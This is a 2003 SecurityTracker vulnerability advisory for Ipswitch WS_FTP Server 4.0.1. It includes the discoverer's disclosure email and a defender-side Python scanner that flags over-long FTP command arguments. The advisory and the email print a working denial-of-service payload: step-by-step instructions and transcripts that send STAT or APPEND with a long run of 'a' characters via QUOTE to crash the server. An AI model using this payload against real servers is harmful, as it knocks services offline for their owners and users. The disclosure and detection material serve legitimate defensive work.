SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   WS_FTP
Vendors:   Ipswitch
WS_FTP Server Can Be Crashed By Remote Users Sending QUOTE Commands
SecurityTracker Alert ID:  1007652
SecurityTracker URL:  http://securitytracker.com/id/1007652
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Sep 7 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 4.0.1
Description:   A buffer overflow vulnerability was reported in the WS_FTP Server. A remote authenticated user can cause the FTP service to crash.

It is reported that a remote authenticated user can use the QUOTE command to send a specially crafted command to the server to cause the FTP service to crash.

A demonstration exploit transcript is provided:

C:\Program Files\NuMega\SoftIceNT>ftp 81.93.35.60
Connected to 81.93.35.60.
220-pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
220-Wed Sep 03 23:58:59 2003
220-29 days remaining on evaluation.
220 pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
User (81.93.35.60:(none)): pejman
331 Password required
Password:
230 user logged in
ftp> quote
Command line to send stat
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

It is reported that the STATUS, APPEND, and other commands can be used to trigger the flaw.

Impact:   A remote authenticated user can cause the FTP service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ipswitch.com/Products/WS_FTP-Server/index.html
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.
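
A defender-side check for the condition described above, as an added example that is not part of the original advisory or the vendor's code: it scans client-to-server FTP control-channel lines (for instance from a proxy log or packet capture) and flags any command whose argument reaches the roughly 250-character length the report associates with the crash. The 250-character threshold, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from itertools import groupby

# Assumption: the report places the crash at about 250 argument characters.
MAX_ARG_LEN = 250

# Verb, then optionally one space and the argument (which may contain spaces).
CMD_RE = re.compile(r"([A-Za-z]+)(?: (.*))?", re.S)

# Constructed client-to-server control-channel lines, not captured traffic.
SAMPLE = [
    "USER user1\r\n",
    "PASS ********\r\n",
    "STAT " + "a" * 255 + "\r\n",
    "APPEND " + "a" * 255 + "\r\n",
    "RETR report.txt\r\n",
    "stat " + "a" * 249 + "\r\n",   # one below the threshold
]

def longest_run(s):
    """Length of the longest run of one repeated character (filler signal)."""
    return max((len(list(g)) for _, g in groupby(s)), default=0)

def inspect_command(raw, max_arg_len=MAX_ARG_LEN):
    """Return a finding dict for an over-long command line, else None."""
    line = raw.rstrip("\r\n")
    m = CMD_RE.fullmatch(line)
    if m:
        verb, arg = m.group(1).upper(), m.group(2) or ""
    else:
        verb, arg = "?", line          # malformed line: measure all of it
    if len(arg) < max_arg_len:
        return None
    # Report lengths only; never echo the argument (it may be a password).
    return {"verb": verb, "arg_len": len(arg), "longest_run": longest_run(arg)}

def scan(lines, max_arg_len=MAX_ARG_LEN):
    """Inspect each line and return findings tagged with 1-based line numbers."""
    findings = []
    for n, raw in enumerate(lines, 1):
        hit = inspect_command(raw, max_arg_len)
        if hit:
            findings.append({"line": n, **hit})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f)
```

The check is verb-agnostic because the report says STATUS, APPEND, and other commands trigger the flaw; the same length limit can be enforced at an FTP-aware proxy placed in front of the server.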


 Source Message Contents

Subject:  Remote and Local Vulnerabilities In WS_FTP Server




Hi dear,
I am pejman.d. I found a new bug in WS_FTP Server.

Vulnerable Systems: WS_FTP Server 4,3
The bug is a buffer overflow in an FTP command; the service stops with some errors.

Step by step buffer overflow:
1- Log in to the FTP server with any username and password
2- Use the quote command to send a command to the server
3- You can use status or append or some other command
4- After the command, 250 characters for overflow: status 255x[A] or append 255x[A] and other commands
 

quote
Command line to send 
APPEND aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
 
SAMPLE :
 
C:\Program Files\NuMega\SoftIceNT>ftp 81.93.35.60
Connected to 81.93.35.60.
220-pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
220-Wed Sep 03 23:58:59 2003
220-29 days remaining on evaluation.
220 pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
User (81.93.35.60:(none)): pejman
331 Password required
Password:
230 user logged in
ftp> quote
Command line to send stat 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
Connection closed by remote host.
ftp>
 
 
The FTP server is stopped and all connections are refused!!!
It works on ver 3,4 and was tested on Windows 2000 Advanced and Professional with SP4.

If you need additional information, send mail to pejman@rite.ca
 
pejman.d (deject hacker )

 
 

